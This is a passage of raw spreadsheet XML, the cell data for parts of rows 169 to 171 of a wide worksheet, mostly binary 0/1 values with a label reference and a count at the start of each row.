      <c r="QD169">
        <v>0</v>
      </c>
      <c r="QE169">
        <v>0</v>
      </c>
      <c r="QF169">
        <v>0</v>
      </c>
      <c r="QG169">
        <v>0</v>
      </c>
      <c r="QH169">
        <v>0</v>
      </c>
      <c r="QI169">
        <v>0</v>
      </c>
      <c r="QJ169">
        <v>0</v>
      </c>
      <c r="QK169">
        <v>0</v>
      </c>
      <c r="QL169">
        <v>0</v>
      </c>
      <c r="QM169">
        <v>0</v>
      </c>
      <c r="QN169">
        <v>0</v>
      </c>
      <c r="QO169">
        <v>0</v>
      </c>
      <c r="QP169">
        <v>0</v>
      </c>
      <c r="QQ169">
        <v>0</v>
      </c>
      <c r="QR169">
        <v>0</v>
      </c>
      <c r="QS169">
        <v>0</v>
      </c>
      <c r="QT169">
        <v>0</v>
      </c>
      <c r="QU169">
        <v>0</v>
      </c>
      <c r="QV169">
        <v>0</v>
      </c>
      <c r="QW169">
        <v>0</v>
      </c>
      <c r="QX169">
        <v>0</v>
      </c>
      <c r="QY169">
        <v>0</v>
      </c>
      <c r="QZ169">
        <v>0</v>
      </c>
      <c r="RA169">
        <v>0</v>
      </c>
      <c r="RB169">
        <v>0</v>
      </c>
      <c r="RC169">
        <v>0</v>
      </c>
      <c r="RD169">
        <v>0</v>
      </c>
      <c r="RE169">
        <v>0</v>
      </c>
      <c r="RF169">
        <v>0</v>
      </c>
      <c r="RG169">
        <v>1</v>
      </c>
      <c r="RH169">
        <v>0</v>
      </c>
      <c r="RI169">
        <v>0</v>
      </c>
      <c r="RJ169">
        <v>0</v>
      </c>
      <c r="RK169">
        <v>0</v>
      </c>
      <c r="RL169">
        <v>0</v>
      </c>
      <c r="RM169">
        <v>0</v>
      </c>
      <c r="RN169">
        <v>0</v>
      </c>
      <c r="RO169">
        <v>0</v>
      </c>
      <c r="RP169">
        <v>0</v>
      </c>
      <c r="RQ169">
        <v>0</v>
      </c>
      <c r="RR169">
        <v>0</v>
      </c>
      <c r="RS169">
        <v>0</v>
      </c>
      <c r="RT169">
        <v>0</v>
      </c>
      <c r="RU169">
        <v>0</v>
      </c>
      <c r="RV169">
        <v>0</v>
      </c>
      <c r="RW169">
        <v>0</v>
      </c>
      <c r="RX169">
        <v>0</v>
      </c>
      <c r="RY169">
        <v>0</v>
      </c>
      <c r="RZ169">
        <v>0</v>
      </c>
      <c r="SA169">
        <v>0</v>
      </c>
    </row>
    <row r="170" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A170" s="6" t="s">
        <v>4503</v>
      </c>
      <c r="B170">
        <v>19</v>
      </c>
      <c r="C170">
        <v>0</v>
      </c>
      <c r="D170">
        <v>0</v>
      </c>
      <c r="E170">
        <v>0</v>
      </c>
      <c r="F170">
        <v>0</v>
      </c>
      <c r="G170">
        <v>0</v>
      </c>
      <c r="H170">
        <v>0</v>
      </c>
      <c r="I170">
        <v>0</v>
      </c>
      <c r="J170">
        <v>0</v>
      </c>
      <c r="K170">
        <v>0</v>
      </c>
      <c r="L170">
        <v>0</v>
      </c>
      <c r="M170">
        <v>0</v>
      </c>
      <c r="N170">
        <v>0</v>
      </c>
      <c r="O170">
        <v>0</v>
      </c>
      <c r="P170">
        <v>0</v>
      </c>
      <c r="Q170">
        <v>0</v>
      </c>
      <c r="R170">
        <v>0</v>
      </c>
      <c r="S170">
        <v>0</v>
      </c>
      <c r="T170">
        <v>0</v>
      </c>
      <c r="U170">
        <v>0</v>
      </c>
      <c r="V170">
        <v>0</v>
      </c>
      <c r="W170">
        <v>0</v>
      </c>
      <c r="X170">
        <v>0</v>
      </c>
      <c r="Y170">
        <v>0</v>
      </c>
      <c r="Z170">
        <v>0</v>
      </c>
      <c r="AA170">
        <v>0</v>
      </c>
      <c r="AB170">
        <v>0</v>
      </c>
      <c r="AC170">
        <v>0</v>
      </c>
      <c r="AD170">
        <v>0</v>
      </c>
      <c r="AE170">
        <v>0</v>
      </c>
      <c r="AF170">
        <v>0</v>
      </c>
      <c r="AG170">
        <v>0</v>
      </c>
      <c r="AH170">
        <v>0</v>
      </c>
      <c r="AI170">
        <v>0</v>
      </c>
      <c r="AJ170">
        <v>0</v>
      </c>
      <c r="AK170">
        <v>0</v>
      </c>
      <c r="AL170">
        <v>0</v>
      </c>
      <c r="AM170">
        <v>0</v>
      </c>
      <c r="AN170">
        <v>0</v>
      </c>
      <c r="AO170">
        <v>0</v>
      </c>
      <c r="AP170">
        <v>0</v>
      </c>
      <c r="AQ170">
        <v>0</v>
      </c>
      <c r="AR170">
        <v>0</v>
      </c>
      <c r="AS170">
        <v>0</v>
      </c>
      <c r="AT170">
        <v>0</v>
      </c>
      <c r="AU170">
        <v>0</v>
      </c>
      <c r="AV170">
        <v>0</v>
      </c>
      <c r="AW170">
        <v>0</v>
      </c>
      <c r="AX170">
        <v>0</v>
      </c>
      <c r="AY170">
        <v>0</v>
      </c>
      <c r="AZ170">
        <v>0</v>
      </c>
      <c r="BA170">
        <v>0</v>
      </c>
      <c r="BB170">
        <v>0</v>
      </c>
      <c r="BC170">
        <v>0</v>
      </c>
      <c r="BD170">
        <v>0</v>
      </c>
      <c r="BE170">
        <v>0</v>
      </c>
      <c r="BF170">
        <v>0</v>
      </c>
      <c r="BG170">
        <v>0</v>
      </c>
      <c r="BH170">
        <v>0</v>
      </c>
      <c r="BI170">
        <v>0</v>
      </c>
      <c r="BJ170">
        <v>0</v>
      </c>
      <c r="BK170">
        <v>0</v>
      </c>
      <c r="BL170">
        <v>0</v>
      </c>
      <c r="BM170">
        <v>0</v>
      </c>
      <c r="BN170">
        <v>0</v>
      </c>
      <c r="BO170">
        <v>0</v>
      </c>
      <c r="BP170">
        <v>0</v>
      </c>
      <c r="BQ170">
        <v>0</v>
      </c>
      <c r="BR170">
        <v>0</v>
      </c>
      <c r="BS170">
        <v>0</v>
      </c>
      <c r="BT170">
        <v>0</v>
      </c>
      <c r="BU170">
        <v>0</v>
      </c>
      <c r="BV170">
        <v>0</v>
      </c>
      <c r="BW170">
        <v>0</v>
      </c>
      <c r="BX170">
        <v>0</v>
      </c>
      <c r="BY170">
        <v>0</v>
      </c>
      <c r="BZ170">
        <v>0</v>
      </c>
      <c r="CA170">
        <v>0</v>
      </c>
      <c r="CB170">
        <v>0</v>
      </c>
      <c r="CC170">
        <v>0</v>
      </c>
      <c r="CD170">
        <v>0</v>
      </c>
      <c r="CE170">
        <v>0</v>
      </c>
      <c r="CF170">
        <v>0</v>
      </c>
      <c r="CG170">
        <v>1</v>
      </c>
      <c r="CH170">
        <v>0</v>
      </c>
      <c r="CI170">
        <v>0</v>
      </c>
      <c r="CJ170">
        <v>0</v>
      </c>
      <c r="CK170">
        <v>0</v>
      </c>
      <c r="CL170">
        <v>0</v>
      </c>
      <c r="CM170">
        <v>0</v>
      </c>
      <c r="CN170">
        <v>0</v>
      </c>
      <c r="CO170">
        <v>0</v>
      </c>
      <c r="CP170">
        <v>0</v>
      </c>
      <c r="CQ170">
        <v>1</v>
      </c>
      <c r="CR170">
        <v>0</v>
      </c>
      <c r="CS170">
        <v>0</v>
      </c>
      <c r="CT170">
        <v>0</v>
      </c>
      <c r="CU170">
        <v>0</v>
      </c>
      <c r="CV170">
        <v>0</v>
      </c>
      <c r="CW170">
        <v>0</v>
      </c>
      <c r="CX170">
        <v>0</v>
      </c>
      <c r="CY170">
        <v>0</v>
      </c>
      <c r="CZ170">
        <v>0</v>
      </c>
      <c r="DA170">
        <v>0</v>
      </c>
      <c r="DB170">
        <v>0</v>
      </c>
      <c r="DC170">
        <v>0</v>
      </c>
      <c r="DD170">
        <v>0</v>
      </c>
      <c r="DE170">
        <v>0</v>
      </c>
      <c r="DF170">
        <v>0</v>
      </c>
      <c r="DG170">
        <v>0</v>
      </c>
      <c r="DH170">
        <v>0</v>
      </c>
      <c r="DI170">
        <v>0</v>
      </c>
      <c r="DJ170">
        <v>0</v>
      </c>
      <c r="DK170">
        <v>0</v>
      </c>
      <c r="DL170">
        <v>0</v>
      </c>
      <c r="DM170">
        <v>0</v>
      </c>
      <c r="DN170">
        <v>1</v>
      </c>
      <c r="DO170">
        <v>1</v>
      </c>
      <c r="DP170">
        <v>0</v>
      </c>
      <c r="DQ170">
        <v>0</v>
      </c>
      <c r="DR170">
        <v>0</v>
      </c>
      <c r="DS170">
        <v>0</v>
      </c>
      <c r="DT170">
        <v>0</v>
      </c>
      <c r="DU170">
        <v>0</v>
      </c>
      <c r="DV170">
        <v>0</v>
      </c>
      <c r="DW170">
        <v>0</v>
      </c>
      <c r="DX170">
        <v>0</v>
      </c>
      <c r="DY170">
        <v>0</v>
      </c>
      <c r="DZ170">
        <v>0</v>
      </c>
      <c r="EA170">
        <v>0</v>
      </c>
      <c r="EB170">
        <v>0</v>
      </c>
      <c r="EC170">
        <v>0</v>
      </c>
      <c r="ED170">
        <v>0</v>
      </c>
      <c r="EE170">
        <v>0</v>
      </c>
      <c r="EF170">
        <v>0</v>
      </c>
      <c r="EG170">
        <v>0</v>
      </c>
      <c r="EH170">
        <v>0</v>
      </c>
      <c r="EI170">
        <v>0</v>
      </c>
      <c r="EJ170">
        <v>0</v>
      </c>
      <c r="EK170">
        <v>0</v>
      </c>
      <c r="EL170">
        <v>0</v>
      </c>
      <c r="EM170">
        <v>0</v>
      </c>
      <c r="EN170">
        <v>0</v>
      </c>
      <c r="EO170">
        <v>0</v>
      </c>
      <c r="EP170">
        <v>0</v>
      </c>
      <c r="EQ170">
        <v>0</v>
      </c>
      <c r="ER170">
        <v>0</v>
      </c>
      <c r="ES170">
        <v>0</v>
      </c>
      <c r="ET170">
        <v>0</v>
      </c>
      <c r="EU170">
        <v>0</v>
      </c>
      <c r="EV170">
        <v>0</v>
      </c>
      <c r="EW170">
        <v>0</v>
      </c>
      <c r="EX170">
        <v>0</v>
      </c>
      <c r="EY170">
        <v>0</v>
      </c>
      <c r="EZ170">
        <v>0</v>
      </c>
      <c r="FA170">
        <v>1</v>
      </c>
      <c r="FB170">
        <v>0</v>
      </c>
      <c r="FC170">
        <v>0</v>
      </c>
      <c r="FD170">
        <v>0</v>
      </c>
      <c r="FE170">
        <v>0</v>
      </c>
      <c r="FF170">
        <v>0</v>
      </c>
      <c r="FG170">
        <v>0</v>
      </c>
      <c r="FH170">
        <v>0</v>
      </c>
      <c r="FI170">
        <v>0</v>
      </c>
      <c r="FJ170">
        <v>0</v>
      </c>
      <c r="FK170">
        <v>0</v>
      </c>
      <c r="FL170">
        <v>0</v>
      </c>
      <c r="FM170">
        <v>0</v>
      </c>
      <c r="FN170">
        <v>0</v>
      </c>
      <c r="FO170">
        <v>0</v>
      </c>
      <c r="FP170">
        <v>0</v>
      </c>
      <c r="FQ170">
        <v>0</v>
      </c>
      <c r="FR170">
        <v>0</v>
      </c>
      <c r="FS170">
        <v>0</v>
      </c>
      <c r="FT170">
        <v>0</v>
      </c>
      <c r="FU170">
        <v>0</v>
      </c>
      <c r="FV170">
        <v>0</v>
      </c>
      <c r="FW170">
        <v>0</v>
      </c>
      <c r="FX170">
        <v>0</v>
      </c>
      <c r="FY170">
        <v>0</v>
      </c>
      <c r="FZ170">
        <v>0</v>
      </c>
      <c r="GA170">
        <v>0</v>
      </c>
      <c r="GB170">
        <v>0</v>
      </c>
      <c r="GC170">
        <v>0</v>
      </c>
      <c r="GD170">
        <v>1</v>
      </c>
      <c r="GE170">
        <v>0</v>
      </c>
      <c r="GF170">
        <v>0</v>
      </c>
      <c r="GG170">
        <v>0</v>
      </c>
      <c r="GH170">
        <v>0</v>
      </c>
      <c r="GI170">
        <v>0</v>
      </c>
      <c r="GJ170">
        <v>0</v>
      </c>
      <c r="GK170">
        <v>0</v>
      </c>
      <c r="GL170">
        <v>0</v>
      </c>
      <c r="GM170">
        <v>0</v>
      </c>
      <c r="GN170">
        <v>0</v>
      </c>
      <c r="GO170">
        <v>0</v>
      </c>
      <c r="GP170">
        <v>0</v>
      </c>
      <c r="GQ170">
        <v>0</v>
      </c>
      <c r="GR170">
        <v>0</v>
      </c>
      <c r="GS170">
        <v>0</v>
      </c>
      <c r="GT170">
        <v>0</v>
      </c>
      <c r="GU170">
        <v>0</v>
      </c>
      <c r="GV170">
        <v>0</v>
      </c>
      <c r="GW170">
        <v>0</v>
      </c>
      <c r="GX170">
        <v>0</v>
      </c>
      <c r="GY170">
        <v>0</v>
      </c>
      <c r="GZ170">
        <v>0</v>
      </c>
      <c r="HA170">
        <v>0</v>
      </c>
      <c r="HB170">
        <v>0</v>
      </c>
      <c r="HC170">
        <v>0</v>
      </c>
      <c r="HD170">
        <v>0</v>
      </c>
      <c r="HE170">
        <v>0</v>
      </c>
      <c r="HF170">
        <v>1</v>
      </c>
      <c r="HG170">
        <v>0</v>
      </c>
      <c r="HH170">
        <v>0</v>
      </c>
      <c r="HI170">
        <v>0</v>
      </c>
      <c r="HJ170">
        <v>0</v>
      </c>
      <c r="HK170">
        <v>0</v>
      </c>
      <c r="HL170">
        <v>0</v>
      </c>
      <c r="HM170">
        <v>0</v>
      </c>
      <c r="HN170">
        <v>0</v>
      </c>
      <c r="HO170">
        <v>1</v>
      </c>
      <c r="HP170">
        <v>0</v>
      </c>
      <c r="HQ170">
        <v>0</v>
      </c>
      <c r="HR170">
        <v>0</v>
      </c>
      <c r="HS170">
        <v>0</v>
      </c>
      <c r="HT170">
        <v>0</v>
      </c>
      <c r="HU170">
        <v>0</v>
      </c>
      <c r="HV170">
        <v>0</v>
      </c>
      <c r="HW170">
        <v>0</v>
      </c>
      <c r="HX170">
        <v>0</v>
      </c>
      <c r="HY170">
        <v>0</v>
      </c>
      <c r="HZ170">
        <v>0</v>
      </c>
      <c r="IA170">
        <v>0</v>
      </c>
      <c r="IB170">
        <v>0</v>
      </c>
      <c r="IC170">
        <v>0</v>
      </c>
      <c r="ID170">
        <v>0</v>
      </c>
      <c r="IE170">
        <v>0</v>
      </c>
      <c r="IF170">
        <v>1</v>
      </c>
      <c r="IG170">
        <v>0</v>
      </c>
      <c r="IH170">
        <v>0</v>
      </c>
      <c r="II170">
        <v>0</v>
      </c>
      <c r="IJ170">
        <v>0</v>
      </c>
      <c r="IK170">
        <v>0</v>
      </c>
      <c r="IL170">
        <v>0</v>
      </c>
      <c r="IM170">
        <v>0</v>
      </c>
      <c r="IN170">
        <v>0</v>
      </c>
      <c r="IO170">
        <v>0</v>
      </c>
      <c r="IP170">
        <v>0</v>
      </c>
      <c r="IQ170">
        <v>0</v>
      </c>
      <c r="IR170">
        <v>0</v>
      </c>
      <c r="IS170">
        <v>0</v>
      </c>
      <c r="IT170">
        <v>0</v>
      </c>
      <c r="IU170">
        <v>0</v>
      </c>
      <c r="IV170">
        <v>0</v>
      </c>
      <c r="IW170">
        <v>0</v>
      </c>
      <c r="IX170">
        <v>0</v>
      </c>
      <c r="IY170">
        <v>0</v>
      </c>
      <c r="IZ170">
        <v>0</v>
      </c>
      <c r="JA170">
        <v>0</v>
      </c>
      <c r="JB170">
        <v>0</v>
      </c>
      <c r="JC170">
        <v>1</v>
      </c>
      <c r="JD170">
        <v>0</v>
      </c>
      <c r="JE170">
        <v>0</v>
      </c>
      <c r="JF170">
        <v>0</v>
      </c>
      <c r="JG170">
        <v>0</v>
      </c>
      <c r="JH170">
        <v>0</v>
      </c>
      <c r="JI170">
        <v>1</v>
      </c>
      <c r="JJ170">
        <v>0</v>
      </c>
      <c r="JK170">
        <v>0</v>
      </c>
      <c r="JL170">
        <v>0</v>
      </c>
      <c r="JM170">
        <v>0</v>
      </c>
      <c r="JN170">
        <v>0</v>
      </c>
      <c r="JO170">
        <v>0</v>
      </c>
      <c r="JP170">
        <v>1</v>
      </c>
      <c r="JQ170">
        <v>1</v>
      </c>
      <c r="JR170">
        <v>0</v>
      </c>
      <c r="JS170">
        <v>0</v>
      </c>
      <c r="JT170">
        <v>0</v>
      </c>
      <c r="JU170">
        <v>0</v>
      </c>
      <c r="JV170">
        <v>0</v>
      </c>
      <c r="JW170">
        <v>0</v>
      </c>
      <c r="JX170">
        <v>0</v>
      </c>
      <c r="JY170">
        <v>0</v>
      </c>
      <c r="JZ170">
        <v>0</v>
      </c>
      <c r="KA170">
        <v>0</v>
      </c>
      <c r="KB170">
        <v>0</v>
      </c>
      <c r="KC170">
        <v>0</v>
      </c>
      <c r="KD170">
        <v>0</v>
      </c>
      <c r="KE170">
        <v>0</v>
      </c>
      <c r="KF170">
        <v>0</v>
      </c>
      <c r="KG170">
        <v>0</v>
      </c>
      <c r="KH170">
        <v>0</v>
      </c>
      <c r="KI170">
        <v>0</v>
      </c>
      <c r="KJ170">
        <v>0</v>
      </c>
      <c r="KK170">
        <v>0</v>
      </c>
      <c r="KL170">
        <v>0</v>
      </c>
      <c r="KM170">
        <v>0</v>
      </c>
      <c r="KN170">
        <v>0</v>
      </c>
      <c r="KO170">
        <v>0</v>
      </c>
      <c r="KP170">
        <v>0</v>
      </c>
      <c r="KQ170">
        <v>0</v>
      </c>
      <c r="KR170">
        <v>0</v>
      </c>
      <c r="KS170">
        <v>0</v>
      </c>
      <c r="KT170">
        <v>1</v>
      </c>
      <c r="KU170">
        <v>0</v>
      </c>
      <c r="KV170">
        <v>0</v>
      </c>
      <c r="KW170">
        <v>0</v>
      </c>
      <c r="KX170">
        <v>1</v>
      </c>
      <c r="KY170">
        <v>0</v>
      </c>
      <c r="KZ170">
        <v>0</v>
      </c>
      <c r="LA170">
        <v>0</v>
      </c>
      <c r="LB170">
        <v>1</v>
      </c>
      <c r="LC170">
        <v>0</v>
      </c>
      <c r="LD170">
        <v>0</v>
      </c>
      <c r="LE170">
        <v>0</v>
      </c>
      <c r="LF170">
        <v>0</v>
      </c>
      <c r="LG170">
        <v>0</v>
      </c>
      <c r="LH170">
        <v>0</v>
      </c>
      <c r="LI170">
        <v>0</v>
      </c>
      <c r="LJ170">
        <v>1</v>
      </c>
      <c r="LK170">
        <v>1</v>
      </c>
      <c r="LL170">
        <v>0</v>
      </c>
      <c r="LM170">
        <v>0</v>
      </c>
      <c r="LN170">
        <v>0</v>
      </c>
      <c r="LO170">
        <v>0</v>
      </c>
      <c r="LP170">
        <v>0</v>
      </c>
      <c r="LQ170">
        <v>0</v>
      </c>
      <c r="LR170">
        <v>0</v>
      </c>
      <c r="LS170">
        <v>0</v>
      </c>
      <c r="LT170">
        <v>0</v>
      </c>
      <c r="LU170">
        <v>0</v>
      </c>
      <c r="LV170">
        <v>0</v>
      </c>
      <c r="LW170">
        <v>0</v>
      </c>
      <c r="LX170">
        <v>0</v>
      </c>
      <c r="LY170">
        <v>0</v>
      </c>
      <c r="LZ170">
        <v>0</v>
      </c>
      <c r="MA170">
        <v>0</v>
      </c>
      <c r="MB170">
        <v>0</v>
      </c>
      <c r="MC170">
        <v>0</v>
      </c>
      <c r="MD170">
        <v>0</v>
      </c>
      <c r="ME170">
        <v>0</v>
      </c>
      <c r="MF170">
        <v>0</v>
      </c>
      <c r="MG170">
        <v>0</v>
      </c>
      <c r="MH170">
        <v>0</v>
      </c>
      <c r="MI170">
        <v>0</v>
      </c>
      <c r="MJ170">
        <v>0</v>
      </c>
      <c r="MK170">
        <v>0</v>
      </c>
      <c r="ML170">
        <v>0</v>
      </c>
      <c r="MM170">
        <v>0</v>
      </c>
      <c r="MN170">
        <v>0</v>
      </c>
      <c r="MO170">
        <v>0</v>
      </c>
      <c r="MP170">
        <v>0</v>
      </c>
      <c r="MQ170">
        <v>0</v>
      </c>
      <c r="MR170">
        <v>0</v>
      </c>
      <c r="MS170">
        <v>0</v>
      </c>
      <c r="MT170">
        <v>0</v>
      </c>
      <c r="MU170">
        <v>0</v>
      </c>
      <c r="MV170">
        <v>0</v>
      </c>
      <c r="MW170">
        <v>0</v>
      </c>
      <c r="MX170">
        <v>0</v>
      </c>
      <c r="MY170">
        <v>0</v>
      </c>
      <c r="MZ170">
        <v>0</v>
      </c>
      <c r="NA170">
        <v>0</v>
      </c>
      <c r="NB170">
        <v>0</v>
      </c>
      <c r="NC170">
        <v>0</v>
      </c>
      <c r="ND170">
        <v>0</v>
      </c>
      <c r="NE170">
        <v>0</v>
      </c>
      <c r="NF170">
        <v>0</v>
      </c>
      <c r="NG170">
        <v>0</v>
      </c>
      <c r="NH170">
        <v>0</v>
      </c>
      <c r="NI170">
        <v>0</v>
      </c>
      <c r="NJ170">
        <v>0</v>
      </c>
      <c r="NK170">
        <v>0</v>
      </c>
      <c r="NL170">
        <v>0</v>
      </c>
      <c r="NM170">
        <v>0</v>
      </c>
      <c r="NN170">
        <v>0</v>
      </c>
      <c r="NO170">
        <v>0</v>
      </c>
      <c r="NP170">
        <v>0</v>
      </c>
      <c r="NQ170">
        <v>0</v>
      </c>
      <c r="NR170">
        <v>0</v>
      </c>
      <c r="NS170">
        <v>0</v>
      </c>
      <c r="NT170">
        <v>0</v>
      </c>
      <c r="NU170">
        <v>0</v>
      </c>
      <c r="NV170">
        <v>0</v>
      </c>
      <c r="NW170">
        <v>0</v>
      </c>
      <c r="NX170">
        <v>0</v>
      </c>
      <c r="NY170">
        <v>0</v>
      </c>
      <c r="NZ170">
        <v>0</v>
      </c>
      <c r="OA170">
        <v>0</v>
      </c>
      <c r="OB170">
        <v>0</v>
      </c>
      <c r="OC170">
        <v>0</v>
      </c>
      <c r="OD170">
        <v>0</v>
      </c>
      <c r="OE170">
        <v>0</v>
      </c>
      <c r="OF170">
        <v>0</v>
      </c>
      <c r="OG170">
        <v>0</v>
      </c>
      <c r="OH170">
        <v>0</v>
      </c>
      <c r="OI170">
        <v>0</v>
      </c>
      <c r="OJ170">
        <v>0</v>
      </c>
      <c r="OK170">
        <v>0</v>
      </c>
      <c r="OL170">
        <v>0</v>
      </c>
      <c r="OM170">
        <v>0</v>
      </c>
      <c r="ON170">
        <v>0</v>
      </c>
      <c r="OO170">
        <v>0</v>
      </c>
      <c r="OP170">
        <v>0</v>
      </c>
      <c r="OQ170">
        <v>0</v>
      </c>
      <c r="OR170">
        <v>0</v>
      </c>
      <c r="OS170">
        <v>0</v>
      </c>
      <c r="OT170">
        <v>0</v>
      </c>
      <c r="OU170">
        <v>0</v>
      </c>
      <c r="OV170">
        <v>0</v>
      </c>
      <c r="OW170">
        <v>0</v>
      </c>
      <c r="OX170">
        <v>0</v>
      </c>
      <c r="OY170">
        <v>0</v>
      </c>
      <c r="OZ170">
        <v>0</v>
      </c>
      <c r="PA170">
        <v>0</v>
      </c>
      <c r="PB170">
        <v>0</v>
      </c>
      <c r="PC170">
        <v>0</v>
      </c>
      <c r="PD170">
        <v>0</v>
      </c>
      <c r="PE170">
        <v>0</v>
      </c>
      <c r="PF170">
        <v>0</v>
      </c>
      <c r="PG170">
        <v>0</v>
      </c>
      <c r="PH170">
        <v>0</v>
      </c>
      <c r="PI170">
        <v>0</v>
      </c>
      <c r="PJ170">
        <v>0</v>
      </c>
      <c r="PK170">
        <v>0</v>
      </c>
      <c r="PL170">
        <v>0</v>
      </c>
      <c r="PM170">
        <v>0</v>
      </c>
      <c r="PN170">
        <v>0</v>
      </c>
      <c r="PO170">
        <v>0</v>
      </c>
      <c r="PP170">
        <v>0</v>
      </c>
      <c r="PQ170">
        <v>0</v>
      </c>
      <c r="PR170">
        <v>0</v>
      </c>
      <c r="PS170">
        <v>0</v>
      </c>
      <c r="PT170">
        <v>0</v>
      </c>
      <c r="PU170">
        <v>0</v>
      </c>
      <c r="PV170">
        <v>0</v>
      </c>
      <c r="PW170">
        <v>0</v>
      </c>
      <c r="PX170">
        <v>0</v>
      </c>
      <c r="PY170">
        <v>0</v>
      </c>
      <c r="PZ170">
        <v>0</v>
      </c>
      <c r="QA170">
        <v>0</v>
      </c>
      <c r="QB170">
        <v>0</v>
      </c>
      <c r="QC170">
        <v>0</v>
      </c>
      <c r="QD170">
        <v>0</v>
      </c>
      <c r="QE170">
        <v>0</v>
      </c>
      <c r="QF170">
        <v>0</v>
      </c>
      <c r="QG170">
        <v>0</v>
      </c>
      <c r="QH170">
        <v>1</v>
      </c>
      <c r="QI170">
        <v>0</v>
      </c>
      <c r="QJ170">
        <v>0</v>
      </c>
      <c r="QK170">
        <v>0</v>
      </c>
      <c r="QL170">
        <v>0</v>
      </c>
      <c r="QM170">
        <v>0</v>
      </c>
      <c r="QN170">
        <v>0</v>
      </c>
      <c r="QO170">
        <v>0</v>
      </c>
      <c r="QP170">
        <v>0</v>
      </c>
      <c r="QQ170">
        <v>0</v>
      </c>
      <c r="QR170">
        <v>0</v>
      </c>
      <c r="QS170">
        <v>0</v>
      </c>
      <c r="QT170">
        <v>0</v>
      </c>
      <c r="QU170">
        <v>0</v>
      </c>
      <c r="QV170">
        <v>0</v>
      </c>
      <c r="QW170">
        <v>0</v>
      </c>
      <c r="QX170">
        <v>0</v>
      </c>
      <c r="QY170">
        <v>0</v>
      </c>
      <c r="QZ170">
        <v>0</v>
      </c>
      <c r="RA170">
        <v>0</v>
      </c>
      <c r="RB170">
        <v>0</v>
      </c>
      <c r="RC170">
        <v>0</v>
      </c>
      <c r="RD170">
        <v>0</v>
      </c>
      <c r="RE170">
        <v>0</v>
      </c>
      <c r="RF170">
        <v>0</v>
      </c>
      <c r="RG170">
        <v>0</v>
      </c>
      <c r="RH170">
        <v>0</v>
      </c>
      <c r="RI170">
        <v>0</v>
      </c>
      <c r="RJ170">
        <v>0</v>
      </c>
      <c r="RK170">
        <v>0</v>
      </c>
      <c r="RL170">
        <v>0</v>
      </c>
      <c r="RM170">
        <v>0</v>
      </c>
      <c r="RN170">
        <v>0</v>
      </c>
      <c r="RO170">
        <v>0</v>
      </c>
      <c r="RP170">
        <v>0</v>
      </c>
      <c r="RQ170">
        <v>0</v>
      </c>
      <c r="RR170">
        <v>0</v>
      </c>
      <c r="RS170">
        <v>0</v>
      </c>
      <c r="RT170">
        <v>0</v>
      </c>
      <c r="RU170">
        <v>0</v>
      </c>
      <c r="RV170">
        <v>0</v>
      </c>
      <c r="RW170">
        <v>0</v>
      </c>
      <c r="RX170">
        <v>0</v>
      </c>
      <c r="RY170">
        <v>0</v>
      </c>
      <c r="RZ170">
        <v>0</v>
      </c>
      <c r="SA170">
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A171" s="6" t="s">
        <v>4509</v>
      </c>
      <c r="B171">
        <v>4</v>
      </c>
      <c r="C171">
        <v>0</v>
      </c>
      <c r="D171">
        <v>0</v>
      </c>
      <c r="E171">
        <v>0</v>
      </c>
      <c r="F171">
        <v>0</v>
      </c>
      <c r="G171">
        <v>0</v>
      </c>
      <c r="H171">
        <v>0</v>
      </c>
      <c r="I171">
        <v>0</v>
      </c>
      <c r="J171">
        <v>0</v>
      </c>
      <c r="K171">
        <v>0</v>
      </c>
      <c r="L171">
        <v>0</v>
      </c>
      <c r="M171">
        <v>0</v>
      </c>
      <c r="N171">
        <v>0</v>
      </c>
      <c r="O171">
        <v>0</v>
      </c>
      <c r="P171">
        <v>0</v>
      </c>
      <c r="Q171">
        <v>0</v>
      </c>
      <c r="R171">
        <v>0</v>
      </c>
      <c r="S171">
        <v>0</v>
      </c>
      <c r="T171">
        <v>0</v>
      </c>
      <c r="U171">
        <v>0</v>
      </c>
      <c r="V171">
        <v>0</v>
      </c>
      <c r="W171">
        <v>0</v>
      </c>
      <c r="X171">
        <v>0</v>
      </c>
      <c r="Y171">
        <v>0</v>
      </c>
      <c r="Z171">
        <v>0</v>
      </c>
      <c r="AA171">
        <v>0</v>
      </c>
      <c r="AB171">
        <v>0</v>
      </c>
      <c r="AC171">
        <v>0</v>
      </c>
      <c r="AD171">
        <v>0</v>
      </c>
      <c r="AE171">
        <v>0</v>
      </c>
      <c r="AF171">
        <v>0</v>
      </c>
      <c r="AG171">
        <v>0</v>
      </c>
      <c r="AH171">
        <v>0</v>
      </c>
      <c r="AI171">
        <v>0</v>
      </c>
      <c r="AJ171">
        <v>0</v>
      </c>
      <c r="AK171">
        <v>0</v>
      </c>
      <c r="AL171">
        <v>0</v>
      </c>
      <c r="AM171">
        <v>0</v>
      </c>
      <c r="AN171">
        <v>0</v>
      </c>
      <c r="AO171">
        <v>0</v>
      </c>
      <c r="AP171">
        <v>0</v>
      </c>
      <c r="AQ171">
        <v>0</v>
      </c>
      <c r="AR171">
        <v>0</v>
      </c>
      <c r="AS171">
        <v>0</v>
      </c>
      <c r="AT171">
        <v>0</v>
      </c>
      <c r="AU171">
        <v>0</v>
      </c>
      <c r="AV171">
        <v>0</v>
      </c>
      <c r="AW171">
        <v>0</v>
      </c>
      <c r="AX171">
        <v>0</v>
      </c>
      <c r="AY171">
        <v>0</v>
      </c>
      <c r="AZ171">
        <v>0</v>
      </c>
      <c r="BA171">
        <v>0</v>
      </c>
      <c r="BB171">
        <v>0</v>
      </c>
      <c r="BC171">
        <v>0</v>
      </c>
      <c r="BD171">
        <v>0</v>
      </c>
      <c r="BE171">
        <v>0</v>
      </c>
      <c r="BF171">
        <v>0</v>
      </c>
      <c r="BG171">
        <v>0</v>
      </c>
      <c r="BH171">
        <v>0</v>
      </c>
      <c r="BI171">
        <v>0</v>
      </c>
      <c r="BJ171">
        <v>0</v>
      </c>
      <c r="BK171">
        <v>0</v>
      </c>
      <c r="BL171">
        <v>0</v>
      </c>
      <c r="BM171">
        <v>0</v>
      </c>
      <c r="BN171">
        <v>0</v>
      </c>
      <c r="BO171">
        <v>0</v>
      </c>
      <c r="BP171">
        <v>0</v>
      </c>
      <c r="BQ171">
        <v>0</v>
      </c>
      <c r="BR171">
        <v>0</v>
      </c>
      <c r="BS171">
        <v>0</v>
      </c>
      <c r="BT171">
        <v>0</v>
      </c>
      <c r="BU171">
        <v>0</v>
      </c>
      <c r="BV171">
        <v>0</v>
      </c>
      <c r="BW171">
        <v>0</v>
      </c>
      <c r="BX171">
